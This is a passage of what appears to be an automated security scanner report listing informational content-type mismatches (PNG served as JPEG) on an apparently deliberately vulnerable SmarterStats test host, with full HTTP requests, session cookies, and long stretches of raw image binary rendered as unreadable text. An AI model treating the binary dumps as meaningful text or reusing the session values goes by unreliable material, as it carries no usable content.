.i.6.J.....Q.'q..pV.l.'.V..l1b-.:........r^.RK.k.E..`.S...J.$N...J1.......m.......cIH.iZ.......%..VVi=P.8b.$N...J..........@9/G..A#K....8O.[..GL...#.Y).q.\[I.e ,....9h.......M]+q.h..8q.8+.<..k+    .......6...Y.6...I.M....l...8).q.\[I.e ,.....a.&..vV.G).&N,..N.....-.    ..1......H..l.hJ.q...0L.ek;+..$...%...{7.........V.....^......1l.M..S...J.$N..d+....[^.../.......MA..d....g...b%...pV.'q.......g....9.....O.m......J..%..^.-.[    6...F.....X..8....I.F.X.;b....<..........C.n.l./.a%.......MA......f..;Gf..J>.....O.d    \.4oN.~.|...3..^........]A&.5d...[.n...c.....U..$.2..`..)h.9..._.I.X..8........?.
...M..?.!..>.4.l...........{    ..\...4..>'t.....gfc...|.#.Y....    M._...|...^.&.h.q87....G.o......{    ..\...4..AN..n.F..mb%...pV...qB.3..O_},h.D.2...X.h.....H.R..K...%.2p..r..4.9%M.!V.)..g%.7'.3....;C3...>.4m..)..I;.Z.l..A..AS......h...#.+..G...?....512.f.0.....q....G..R..8...`.@X..AS...d...?.+..G...?..    .1|...,.....6sf'..JP..b^9..]E.m.......4..dN..Q..Oq..Y..r!..-.v....";.........D...a.g...y.V1/....m.`;6....|}.Z61OS..r.\=....m..Qt.._lb...8..d.{....?..B..;.....I..i..4..}....1oario....G.\d/....mn.,[.....e.l^..l....u^.l..Rp.].W...2.z.t....P.n^.4..../[D`....@(._...l...`pQ.i....fK+.0..^v..5..I3/?*...h..x..
.v..>....?...J..o.`Cv-.U.............`...i....5."/.8...<......=...{..i^v9.h.....D..$.`g.......T.$..0...f.}..8..#3.(C..v.7..Xa.e.Z_Y../&.!....E....>.O@..2..i.l..O.c.8/u...I.....Bd...e. o;f.)...8...<N...X.....>..X.._.sWsf..'.WRY.X..|..=..>....A<&.. b.g.    _3....L+..kj...T..21oH..z...2U....l.l#....t ....^x.|....K.......|..>.......q....{5)...XM..;.........6#.V._[<.qJ......eG..,j~.z:.-.f.IM......b`...Y...t.g...5..+...J.u.g`Y..u..5_p.n...tS.FQ.w..Aq*.....)sx...pty..
.....z.xe)." ." .. .i=..s...[.:............C@....:...........8# ....N,." ." ." ....`+..."." ." ." ...H.E..Xg.....k..g.ky..;.....;.k`..En...r..X...._...3.....V..W......7..
>.r..xh.....c|..e.Q.....g{....Wme.:..0...=..k...`.T.f...LX.!X(.. ....C...weG..
.....S.5.....;:~.Rl.8[.....%"..Un[X...-e......e....J...4.....`.H...e._.._.._........gR.-Z...;.2#._Z;...._.!..6^....nI>.c....+...}a..F.U.[......|Mf6..z.O.<
..Q..;.x~.Q."...3..p.b....2....Nv`.2.m..y...l...v.E.Q.-.Z..yR.....bw....,..o..~.m......M...=(...Q...J.f..Y(.J..vP.EA..o....,..}.....om."I....k...v....b.Y..QH..Q......l........r>.r...6....~U..b.`.f...f1....~....i0..b.d?BA9.zo..>.`C.)....i[.?aaj}    ..EO....k.`..=....-.'..?l..f....6|.rI.b..`....9D..M..q.d'.=...6,......`[.....`_.qnZ...,....j.....n.oA.......S....B.-~ J[.g.C......m..=.S..K..a.5g.&.......'%Vdi...b.. ,v...D.2......%6_Ya.....!6..../.w..Q..E.........\.$...q?.z....U.}(.......PB...h....n.o#4..ZK...(.G..I.E ....N...(.D
..a.j..e.(/......./. .4..h2n....r......f..?...kp4v...lZ....i.Ar.?...`Qk.    .......]...p.]].....Xt..H...Z............l.$..q.Q" ." ." ."P..    ..P.B" ." ." ."....[6n:J.D@.D@.D@.J# .V.j]H.D@.D@.D@....`..MG..........@i.$.JC............@6..l...(..........(...[i.u!...........F@.-.7.%." ." ." ....`+..$." ." ." ...H.e...D@.D@.D@.D.4..l....D@.D@.D@.D ..    .l.t............F...............IEND.B`.

10.25. http://vulnerable.smarterstats.6.0.host:9999/Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.26. http://vulnerable.smarterstats.6.0.host:9999/Temp/610228c0ba7b4ab6803b2930991bc819.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/610228c0ba7b4ab6803b2930991bc819.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/610228c0ba7b4ab6803b2930991bc819.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 7789
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d....IDATx^..[.lIQ.....TT.."".xE........E..V.W..[3../....m^.a.O..3.....Y....U.U..wDe...g..^+.:.gWDfd.."#3c?6.OX ,..X...-.?.....a.!@.. ,..X...... *......b......[ @.x.D...a..Q...@X`q.......@X ,. .1....,n....]......:......z....G7W.....l~.`S.n.E/....gn.N@t;\o.2..G7..._........j....(.._..:.Q...F. ......D....../.G..a.3.@. .V....dnu......>|8<......3../..b..A....x....Q./.d    vu3l"@. .[A`....1..o.m.1......[....90-q...Y..........k.``........../...........V...\..k......k...w.....5....V...p.[..l..9.|.=@..k..k....9o...UZ..?.h_M...Ztu........Q..N=.2.N.....K ....."r.. .WS....]....<.lK..Q.f}..    0~!..].D..m.......}....._.>D..D....g.Xm.. *.n.s-.P V}d...m.....g.%<.....m..l.y.s.N..Q.P7?..gi.Zt.GTj...Z:.@..G.k@.aKi...G..s!+..h_..a.k.. ......{..............%@.K.jl........$..NV..~.A.]..-<..c2<.j...@L... ....E..g...%@..Q.<.<...i....%...-..\.D....................!t...X.u.4;.Y-.o.R....K...DMVt.E......}0..]...w5...{..k..I..~........w.>*sV......."..%........V.4.rV.....Gb.. h.....F.PD..de.Y.}?.@....U.(7j*y.......K.?..zl...N{D.....@.<* u.@.......D.K.mR..w..H./ ..!..dRy......'..w...&......d...xR~....Tg.#:..<.K3....Ga.Y.}?. ...G....Lv.2.T_..~A4...!"g.n<.t.T...C.y...yT@...."t.@....vs.....~.~...O......{*..........$..\,}..X...>.......j.Z.l..O...1...yD....j..O%......O....y..d..4..1.....}.K.Y`@CH...V.k.....i..c("O.....vf){D?./......3.V3cZ.K5.......Y..'>...s.#.m.......@.uT`..R..%...    "b..f. .J...]..R..<....b.G...q.....%.,0.!$.,}..X..A..R}-..D..-x...
..
D....4.........1......-..D5.y........O&.:.".....A.\z....X)...+@Tj...Z:.@..G.....@....<"t.<.....h.3%.....mWf@w.+....."p.@...S;[._.-..#..Q........O&.:."......@..~<A.],.1..5c.1VJ...
..Z.....(...4...tT`)..S..<|5c.96[t..jzs..jt.E.i...........X....z..m.C...|...Q..'>...s.#...B.PD^/ zO......Q.2.;..q..m..H..wzK..K.I....<D....4CCH.Y b.R...C..R.-.:......y..9...+V.]...fL..O:..?.0.K/.lK. ....F....]..h:y...124......<"t.E.i...R..],0.!$..D.^.....rS.....)<....k..<*..f.....t.@.\z.x,./.R}-.:..r.p z....U...aZ..:.2U'/]"W....-..S.<A...G........Z..R.+.V~.l@.=!..L..3....X....].....y.G....L../.F.
bD....$..<    0.........#b..3......t.@.:.Z...Q....N...{.t.<.K.C.PD^/ ..."t    ..:X]L......e.1.....|...v..G.....@.:.Z5    b...\... bf..A...........v.2....O.b......-.4........n.fM.t.E.. r....:R..J B..Q,..Q....).]....u.M.......C.="4.D..w..g.d....Z.."@...'............w.D...w....t..1..5.%@Tc-.g. bf..A......<.D...h..<.D..g.t    ..X..Y...Y.d...../.6..]^..`...X b.=k.K...Z.."@...'.......A..#B...<..?.7......\z.L..Q....E...uO.9[.k."mc...G....3ADZzJ.<..........i..Y...    ....K...yDl..#..],....R...@"Sk_...MX
."r.wf.?.tL.....#z._'...y&.x8........"..9...    ...X..%...=A.],..<>.C....K?...W...40[.z."....k..{Dh...^@..tb....G..!u3<J=?.-};.Acy.F..[.S.. b...A...^..<D..x..........XKO....D.:P..^ F$.;.....0..A.....='2....7.\=.6,:.=J.......g...Y.Y...50.Q.D..@...-Y.....*.u..t&/.....;o(...D[.-.....J..[..A..."t.@.>.%.4...*..<.......cw.....]d.................#e...^9f.<.l}......|.>..W`\..[.....L.M......S...
$2.........s..#RR....!...1..>..E.i....x^.}_...X...(..U .y......wnJ..m.l.?...>.......A..[.z.".z..[........w<......g\...(..U.MJ....Q.%._ y>..l}.....@..Ge..-.@......*..<#...4.=..S.q...=3.....>..E.....M.B..D.........<C.5z;..!.....d......"O..W`|jHI....y&...I.3Y.'.E...(...%.....V..1S;. `.C/]D.."V`</..........k.)u.8./2..D J.. @..Q.'.[..k...
.g[~O...X z[...E...    |.. r...D.d^l}oN...h...._
D,.O..q.Ud.%.<..!............/2.Y.........X.Q.h..d...y....YmK... b.v......t.y.G.
./."..'..8./2..#..h.{F..SADi.....Fu.<l}L...Q....<"t.<"..'u.8./2..D....w...3...D...y......"O... ..."p.@......._E.Y...
W...y]d......=.........,0|W.... .....Bx.|...".$!@....=".>&.X..l..L B..D,.O..q.Ud.....@#..l}h.A.i...D.@....X........
.R?a.]...-...#b.....l}L...Q.... .........<#.h9..jF..u.1O..>.. .4.h. by|b_.....sK...#.w.r...*V>w..q.jd.V.}..u(....    "V<*......t.<".h.....D..zD....P@r..@..;.....r...w.D.5....K...yD.e.%.....r. ..c...n.'y....T-.........1..^@..T.t..DX........<o.....m..$.......K.......^.....l}^ .J.....l..?N .....>/.o...o..o.I.?.le.f.y.l....,...H..,..C*...d5..P^N...=...yD.e`...%..K..(....<D..zD....d.G.......u(O..>.. .z...S]......w.aH.<.y..3..a...%..#:.P;..?.."..Y..3........@.....}....H ...D,./@T.....x.~.+...g... b.C{."...}k.....".g.Q..#.C..g...:{..3O..2&f..=........m{C...X}........Df...Q...N........D..".2p.......p.@.......G~]...H<Y=..............D^/ ...!t..D..<........... b.....l}h.A.i b-..-.9..],..<>...1..-.....8..uZ6O..>.. .4....;.]'...."f.........i......N.j[.l}h.A.i b-.3..)A.]L...
X..c.ZF..Q...DjZTk..'..SA...k....oLuA...,.O..q..z.v.T...    D...y...1A.Z..@.G    D..K..#....<@Tj.'..N........D.......... ....X..:x...vXK.axDN b.R......1.<D,...@.....
..B.\.(@.f#.........D_.......%z.N.i...].^.. .....X....8[.z..<m....l.....K/...U.,5.p........^Y....a........3.. ....g7.@F9....H>$;.?.d5..Z..[..c.y.G.Z.f[~..||@..D..:+........f...#......#Z"1..lH.<l}.O..]4.....@.....cwU{..E.h...Kt.4["U,.40[..c.y...u....K..cwU{....H.`.]f. B'..:..%`g....T.w.e.f...~.....4}^...-=R..|.g.<......ga..7..N......SV.A....."O.......kS].....@{.>...........?....].F...9.YgCr\...=QE.....o..........c.._.9....... B.kD...|..=?......I.<65.......8.hd..c.COT..yD.e`.._......X..:xljh.5k..z.f5V8z.q...%.'.[..D,.k1....V..#..%....."'..k'D.....=...yD,.e.}..>?.....@+u..d.%....X @.^..&.z...K....b_.X....f..G.."..l..g.c...}e[..w..........^..K*@Tc.'..vB..a.{M.`.E..X......"t.@.....#...p.....9.....'.[.z...K.......4v.,b............y.....~n@.^.m...Z........G..    ...[.......G..^..W&....".h....    Y...R....@..    .....=QE.....Z..G,Q..P
!y.@.."V.2....    ".2I.Y...~...],}L.y,........x.(.!^.....X.....*u`A/C.+.........c    .]X.....9.....'.[.z..<mi........V..1)i...^.'x. .4.wy.R....G;[.o.....<3.I>.....f.2I.Y.|.o>7...].@. .A..g....I..$....u.R....U.i...z.......b_t. ..]3.\..u,.....-..8.i;=O./O.@.D.L...X.D.K.....:x,..{.5>.zcD...K$.g.X..X.U&..C......]zX
J.<B.V...F....Rl..q./:..(.B'.G.WE..$-.;[.z.............6..l.......9.<..#..-.4c.5...&..7.L........Et.a)(u.8.e...L.h.B.C...v..Al.J..f....3.{r..=QE..#.........;V....Kx.T|)...U-.n..[...    ._-...g.5....U.i bA/{D_........(.u...F..Qi.O=......Su..3h...U.. .{'.......b_.%.v...<...h.Z.....<y..^......X...|...................X.    D.o......*.4...'.,0|q.....".O.:'U:..#...y9...d..'...@......T.t.@.......^.Bg......X..Rq.D.y...W?6..\z.........Y......X.rK.5.(MTt.@.......n....1.....m4..j,..".r...5Ye..te.a.....>..G.....N....@...[*...."O..X.v ..."p..D._XZ|..B.\..    D.oq../H..]T... ....n........O........D5.p...[...`MV.<,].#Z.>.e...+....9.h..9O......t.<..%..],.....g.#.O.....-.K!.K3.R.....zP. "A/C...>t..|^....,.QxDN...[u..U&..
"...Z.I...e...3@td........5|./.....G..%.]"...yA..{.hl.......Z...Yk.....Q!n.........[.]4...G.Y..Z.yA...
..e.#..Y...O.O<.D..A....x...J..{...O,......8w....L]R.5.[s.........=0....g..a..g....k....E...D...g.%>....P,pv..X.f..b.P.......Y.hV...a..@w...u.%Q....Y @ty}.-..tg..Qw]..
.\...D.}~..........W7...G..Y..5.M.q..k...G.D.......$...a.....k......m;..x.TL..G.DEfJ.i09..... .iS6.y4.\./T.f}kn.t...W8.k....ZK.3...Wt=lWh.....n&..W.K.G.f}kn...Z.X).3....
.._%..H.. Z..5.m..]m.....c..N....D..*q.. *r..U_.R......c.t.T<. .0......ls.E.s-.k...
....5..,X}.}W1e.....j.....>...s/X.cG9x].p.....K.+u#.~:@..f.
....,. j2[|(,..@Z @..f.
....,. j2[|(,..@Z @.hM-9[.....P..M..O.;......v..O.o9.IOtw...'........n......._.O.&....N..z.i......K..V....Ik.1...o.......Z..............&..6.....i.w...N.o(....    =n&.i...u........[....UU_.<.o..'..N
...4.......w...^.&.f.....7;{&..f.K.z.    ..@.P.d...L....4.|..]p.]zmPp..M....f.....T.N.....f...=q^...    .h.nak. ...a.....Z-.....<r....<h71..|....8.
.....>}..F....d........j....e.....U.[....SZ..@}....-..
..s...t.......f-....<....f_.O....w.vw.6u..X!1.E.a.s{..U...MI...,j....YCC.w..........z.j....".){.T....1.m.C...V7...X..u@.,.;..)...1d... f.!a....X bD......@....u.5Q....X @t9}.-.tk..Q.]....\...D......@....u.5Q....X @t9}.-.tk..Q.]....\...D......@....u.5Q....X @t9}.-.tk..Q.]....\...."...a.......IEND.B`.

10.27. http://vulnerable.smarterstats.6.0.host:9999/Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 9648
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d..%EIDATx^..W.lWu.....I66.......s.4"...    .M.......ml....Q.,hLR....6...@B`..'^....{wO........5._W....f.......:}N_Px@...... ....&pA..c. ...@......
.F.@...... .......;..... ...@....=...@........@... 6...... ... l... ...@...HN.aK...<.@...... ........ ...@ 9..-..b. ...@.....
..v..Ge4..x.}....8.iy.[.........<....@.......E`e.m*V..U..q9..........o...........u!...@....@%...vt.....d..IU.c.U..O.......^...Q.... ...@`...C..d..1..V'i.N....#b[..i.....c.    ..@............9.yl.7..?.YJ.<.I....Y.677.u.]wN|.3.)...w......=@...k..;;;V.\ma;....q..9N.6..1,.&.<.%.sx.K`.W..a><..+...    .v.......W.....9.....=/.....V...d...-....R..s..%....."0...$.|.....:F.W.6....tv.t....W.V6..z.......K.h...._/..d.E...g.XX...x......7.......<}.=....c..C..=..-z4Y+..(UL...D...0...mC)..............z.s.{w\[;-..C...N.2..l/...'..........rd..A1V..1^.l....9.'^.a.L...Z.G.M.w.V..#......0..rd..as..\....|...).    ..u..'.6............1T..!\.d.#l.FR. l..?...*k..aS....tR.L.d...*0......a.t.X....u..e
y.......    .Ml......rd..A1V..1^.l.#l.>.kt...VaK.....
[.@..6G.tT.L.d..."0...$..a.4.Z....U..L!.....%
.M.r&l:)O&.2..H..Ghyra..y:I....>....Wa......5..Ug.....b...c...0G..}$..!lY'l.B.....&..............1T..!\.d.#l.FR.t...TaK...=.N.....v9.6..'....c.
.#.<.0G.<.$V.!l.*k.B..O>..D...M.)Q..)...    d.....L.0G.L....!l/...).6.W.r....{....n..s..O.a..y.a....e.B....    [.`...U8......vP...y..#........=../..e
]..].-O lr.3}.QY29.Y0...<....s...Hj.....WS}.YU.....v9..tR.L.d...*0......a.t.X....y..e
}..G..8"lb..4.V..#......0..rd..as..\.......Y2.,l.xf)..a...a.QY29.Y0...<....s...Hj..-pJ......'.6......<...<.#U`.....9...$.J.a..:a....-..5qD..&..........2P...X.T.#l.V..t...UaK...]Z'ly.a.z.e.......vP...y..#........=..O..e
Y.>^e-Q lr.#l:*K&.2..P...pY.a..Y.I-...>....Wa......L.tR.L.d...*0......a.t.X.......Q2.>a.Ua.........A.29..@...<...
s...JZ......s...Z.@...oY,.:+G&...c5`.........v..Ge4..x.}b.lO.'.D._...[D..V.-O l.....,.:+G&...c5`.........T.6.f....G.r..M..(..&x.9.....!lTO.f
..h"Yk...    ......rd..A1V..1^.l.....m.C2v..M..O....}^i.....*l.B....    [.@............vP...y..#...$lmb6....1.;&lekc:.;.l..W.....a..L!.....%
